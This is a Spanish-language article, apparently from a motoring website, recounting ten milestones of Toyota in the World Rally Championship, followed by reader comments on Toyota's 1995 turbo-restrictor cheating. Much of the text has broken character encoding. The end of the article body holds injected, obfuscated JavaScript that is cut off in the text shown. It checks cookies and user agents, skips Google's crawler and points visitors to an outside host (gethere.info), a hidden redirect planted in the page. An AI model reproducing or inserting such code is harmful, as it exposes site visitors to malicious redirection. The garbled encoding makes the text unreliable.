10 momentos histA?ricos de Toyota en el rally

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7. TOYOTA Celica Turbo 4WD World Rally Champions 1993slider
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9. TOYOTA Corolla WRC Colonia

Toyota ha regresado esta temporada al Campeonato del Mundo de Rallys ai??i??World Rally Championship (WRC)ai??i??, tras 18 aAi??os de ausencia. Este fin de semana la actividad retorna luego del parate del verano europeo con el Rally de CataluAi??a, a disputarse sobre asfalto. La ocasiA?n sirve para hacer un resumen de lo que va de la temporada y de la historia de la marca japonesa en este tipo de competencias.

En esta ai???temporada de aprendizajeai??i?? el equipo Toyota en el WRC ya ha sumado dos victorias y tres podios: Jari-Matti Latvala consiguiA? la victoria en el Rally de Suecia y finalizA? segundo en Montecarlo y CerdeAi??a, mientras que Esapekka Lappi se impuso en el Rally de Finlandia, donde Juho HAi??nninen fue tercero.

Tommi MAi??kinen, Director del Toyota GAZOO Racing World Rally Team (WRT), asegura: ai???La gente no esperaba que Toyota lo hiciera tan bien el primer aAi??o. Estamos muy satisfechos con lo que llevamos de temporada. Ha sido un aAi??o previo tremendamente intenso de trabajo y desarrollo, y esta temporada nuestro objetivo es aprenderai???.

El expiloto finlandAi??s tiene claro que el Yaris WRC con el que Toyota compite en el WRC tiene mucho potencial de desarrollo para el futuro. ai???En ello estamos centrando los esfuerzos. En 2018 estaremos preparados para luchar por el mundial, ese es nuestro objetivoai???, aAi??ade MAi??kinen.

7. TOYOTA Celica Turbo 4WD World Rally Champions 1993

7. Toyota Celica GT-Four_Carlos Sainz 02

En total, Toyota acumula cuatro tAi??tulos mundiales de pilotos y tres de constructores, obtenidos en casi tres dAi??cadas de competiciA?n. Y es que la historia de Toyota en el Mundial de Rallys estA? plagada de Ai??xitos y momentos Ai??picos. Entre 1972 y 1999 Toyota participA? en un total de 121 pruebas del WRC, sumando 43 victorias, 144 podios, cuatro tAi??tulos de pilotos ai??i??Carlos Sainz en 1990 y 1992, Juha Kankkunen en 1993 y Didier Auriol en 1994ai??i?? y tres de constructores, en 1993, 1994 y 1999.

AquAi?? repasamos 10 hitos de los mA?s importantes de esa historia:

1. Toyota_Ove Andersson

1. El legado de Ove Andersson. El nuevo equipo oficial Toyota GAZOO Racing estA? capitaneado por el antiguo tetracampeA?n, y rival de Toyota en los aAi??os 90, Tommi MAi??kinen, pero durante tres dAi??cadas el nombre de Toyota estuvo ligado al de otro piloto: Ove Andersson. El sueco convenciA? en los primeros aAi??os 70 a los directivos de Toyota de la importancia de tener un equipo compitiendo en rallys en Europa, organizando el primero de ellos, semioficial, con sede en el Viejo Continente (Andersson Motorsport). Derrotar a los Datsun 240Z con el Toyota Celica en el Rally RAC de 1972 fue el espaldarazo definitivo para la constituciA?n del equipo.

2. Toyota Celica_Rally RAC-Primeros puntos

2. Primera victoria y primeros puntos en el Mundial de Rallies. En 1973 se creA? el Campeonato del Mundo de Rallies FIA y Toyota obtuvo su primera victoria en el remoto Rally Press-on-Regardless, celebrado en Estados Unidos. El canadiense Walter Boyce, con Doug Woods de copiloto, se impuso en esta prueba al volante de su Toyota Corolla. Sin embargo, bien por ser un equipo privado, bien por la ausencia de los equipos oficiales europeos, algunos consideran que los primeros puntos del equipo Toyota en el Mundial de Rallies se consiguieron en el Rally Alpes AustrAi??acos. Fue tambiAi??n en la temporada de 1973, con un Ove Andersson que terminA? en octava posiciA?n al volante de un Toyota Celica.

3. Toyota Corolla Levin TE27 1975 1000 Lagos Mikkola

3. ConsolidaciA?n del equipo en Europa. La ai???Crisis del PetrA?leoai??i?? provocA? que Toyota, como otras muchas marcas, anulara sus programas deportivos en 1974, pero Andersson mantuvo vivo su equipo de rallies gracias a los concesionarios europeos, que le cedieron autos y apoyo tAi??cnico. Andersson, en compaAi??Ai??a de su compatriota Bjorn Waldegaard, logrA? que los Toyota Celica y Corolla siguieran destacando en las mejores pruebas, como el TAP Portugal, donde Ove Andersson fue cuarto. Eso supuso la consolidaciA?n del equipo en los rallies europeos y permitiA? que Toyota retornase pronto a la competiciA?n de forma oficial.

4. Toyota Team Europe_edited-1

4. Nacimiento de Toyota Team Europe. En 1975, Toyota regresa oficialmente a la competiciA?n, renombrando el equipo como Toyota Team Europe y trasladando su sede a Bruselas (BAi??lgica). Hannu Mikkola, sustituto de Waldegaard, logrA? la primera victoria de la formaciA?n en el WRC al imponerse en el Rally 1.000 Lagos de Finlandia con el Toyota Corolla Gr.4 de sA?lo 1.600 cc. La agilidad del pequeAi??o Corolla y el talento de Mikkola, un experto en la prueba finlandesa, permitiA? que se superara a autos mA?s potentes. A partir de ese momento, el Toyota Team Europe se convirtiA? en uno de los favoritos en cada prueba del Mundial.

5. Toyota Motorsport_edited-1

5. El TTE se convierte en fA?brica de automA?viles de alta competiciA?n. En 1979 el equipo se muda a unas modernas instalaciones en Colonia (Alemania), donde se construye una autAi??ntica fA?brica de autos de carreras, con todas la infraestructura necesarias para su diseAi??o, desarrollo, y fabricaciA?n. De Colonia salieron los autos Campeones del Mundo de Rally, y mucho mA?s adelante, tambiAi??n los monoplazas de FA?rmula 1 y los prototipos del Campeonato Mundial de Resistencia ai??i??World Endurance Championship (WEC)ai??i??. Ove Andersson fue cambiando su labor como piloto por la de organizador y director deportivo, rodeA?ndose de otros eficaces colaboradores, como el ex-copiloto Henry Lyddon.

6. Toyota Celica Grupo B

6. El primer Grupo B de Toyota. La entrada en vigor en 1982 de la nueva reglamentaciA?n de Grupo B (en sustituciA?n del Gr.4) obligA? al Toyota Team Europe a desarrollar un nuevo automA?vil que sustituyera al Celica 2000 GT. El TTE no diseAi??A? un ai???prototipo de carreteraai??i?? con motor central y cuatro ruedas motrices, como sus rivales de Peugeot o Lancia, sino un auto mA?s cercano al modelo de producciA?n. El Toyota Celica Twincam Turbo de 1983 montaba un potente motor de 2 litros turbo con 370 CV y supo explotar sus principales virtudes: la robustez y la confiabilidad. Gracias a ello se convirtiA? en una leyenda en A?frica, donde destacA? en las mA?s duras pruebas del mundial: los rallys East African Safari y Costa de Marfil, que ganA? aAi??o tras aAi??o hasta 1986.

7. Toyota Celica GT-Four_Carlos Sainz

 

7. Primer campeonato con Carlos Sainz. Tras la prohibiciA?n del Grupo B por parte de la FIA, Toyota diseAi??a un nuevo Celica de competiciA?n basado en el reglamento de Grupo A. El Toyota Celica GT-Four fue el primer Toyota de rally con cuatro ruedas motrices, un automA?vil que marcA? una Ai??poca por su eficacia y fiabilidad. Con los seis podios de Carlos Sainz y Juha Kankkunen, se conquista el subcampeonato de marcas en 1989. En 1990, el piloto espaAi??ol realizA? una temporada espectacular: ganA? los rallies de AcrA?polis, Nueva Zelanda, 1.000 Lagos y RAC, proclamA?ndose CampeA?n del Mundo de Pilotos y logrando el segundo puesto para Toyota entre los constructores.

8. Tres Titulos Mundiales

8. Tres tAi??tulos mundiales mA?s. Toyota se convirtiA? en la marca dominadora del Mundial a principios de la dAi??cada de los noventa. Con nuevo Toyota Celica Turbo 4WD, Sainz, Kankkunen y Auriol ganaron tAi??tulos mundiales de pilotos consecutivamente en 1992, 1993 y 1994. AdemA?s, Toyota se llevA? el Mundial de Constructores de 1993 y 1994. Estas victorias permitieron a Carlos Sainz ser bicampeA?n del mundo en 1992 y a Juha Kankkunen, que retornA? al equipo, en tetracampeA?n en 1993. Para terminar esa gloriosa racha, el francAi??s Didier Auriol ganA? el Mundial en 1994, aAi??o en el que Toyota se impuso en la mitad de los rallys del campeonato, con un dominio aplastante.

9. TOYOTA COROLLA World Rally Car

9. Llegan los World Rally Car. El reglamento cambiA? a la formula ai???World Rally Carai??i?? (WRC) en 1997, con autos mA?s potentes y rA?pidos. Toyota retornA? de forma oficial con el nuevo Corolla WRC, que se enfrentA? a las creaciones de Mitsubishi, Ford y Subaru. Con Carlos Sainz de vuelta al equipo, Toyota regresA? a los puestos de cabeza y el espaAi??ol estuvo a un paso de coronarse CampeA?n del Mundo por tercera vez en 1998 en el decisivo Rally de Gales. Pero en uno de los momentos mA?s desgarradores de la historia del deporte, no pudo llegar a meta, sumando el segundo abandono de la temporada. El tAi??tulo fue para Tommi MAi??kinen, que habAi??a abandonado en seis rallys esa temporada… Al aAi??o siguiente, gracias a Carlos Sainz y a Richard Burns, Toyota volviA? a coronarse como CampeA?n del Mundo de Constructores.

10. TOYOTA CampeA?n del Mundo de Constructores 1999 WRC

10. El A?ltimo Mundial de Marcas. En 1999 Toyota volviA? a alzarse con el tAi??tulo de marcas gracias a Carlos Sainz y a Didier Auriol. El piloto francAi??s se impuso en el Rally de China y ambos mantuvieron una impresionante regularidad, con 14 podios entre los dos.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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4 Comentarios, RSS

  1. Marcelo Figliozzi 03/10/2017 @ 1:19 pm

    El informe está muy bien, pero omite el momento histórico número 11 para Toyota. No dice que los echaron literalmente del mundial de rally a partir de Cataluña 95 y por todo el año 96 a causa del by-pass que el equipo le hizo a la brida reglamentaria del turbo. Dicen que es la “truchada” más finamente elaborada en un auto de carrera en mucho tiempo. Acá va un link donde se puede ver con claridad en un gráfico : https://www.carthrottle.com/post/wqm9665/

    • Pablo Felipe Richetti 08/10/2017 @ 11:35 pm

      Exactamente, había pensado en hacer el mismo comentario. El suyo, con el ejemplo aportado es muy valioso.

    • Beppe Viola 09/10/2017 @ 5:09 am

      Exactamente… pero se hicieron agarrar con las manos en el dulce… Lancia supo hacer algo parecido (en las epocas del gran Fiorio) per nunca los agarraron… cosas como la inyecciòn de agua camuflada como agua para el limpiaparabrisas, el cambio entero de autos en regimen de “parc fermè” y otras amenidades..
      En las competiciones no hay trampas, hay habilidosos “escondedores”…

  2. Jan Lammers 09/10/2017 @ 8:36 pm

    Un amigo era fiscalizador del ACA en el rally de 1988, y tenia que colocar un precinto en el motor. Se acerca al tano Capo Squadra para pedirle permiso y colocar el mismo. El italiano le dice que de ninguna manera podía colocarlo y que en todo caso él mismo lo iba a hacer. Mi amigo le explico donde debía ir el precinto y el tano lo colocó, sin dejarle acercar las manos al vano motor de la Lancia de KKK.

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